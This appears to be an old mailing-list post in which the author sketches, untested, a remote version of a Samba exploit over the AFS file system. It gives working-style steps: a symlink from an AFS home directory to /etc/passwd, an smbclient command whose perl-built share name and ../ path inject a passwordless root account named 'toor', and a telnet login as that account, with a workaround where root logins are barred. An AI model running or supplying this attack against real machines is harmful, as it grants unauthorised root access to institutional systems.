I was hoping to test this out but haven't been able to so here goes on
theoretical...
How to make this exploit a remote one using AFS or other remote file
systems.
What does this exploit need on the remote side?? A
symlink; soo... on a AFS system ,preferably one of a well known node that
most AFS servers would have in their CellServDB such as
andrew.cmu.edu or athena.mit.edu, create a symlink to /etc/passwd named
x.log like
ln -s /etc/passwd /afs/andrew.cmu.edu/usr/<username>/x.log
now make the symlink world readable... then all you need is UNIXes running
samba in the vulnerable configuration and running AFS.
smbclient //afs.machine/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
-n ../../../afs/andrew.cmu.edu/usr/<username>/x -N
telnet afs.machine
login as toor
if root logins aren't allowed make a dummy account first, login with that
then make a toor account ontop of that and su over to toor.
what machines does this really effect? Those running samba and AFS,
mainly educational institutions or other large institutions.
Christopher Palow
[EMAIL PROTECTED]
Senior Electrical and Computer Engineering
Carnegie Mellon University
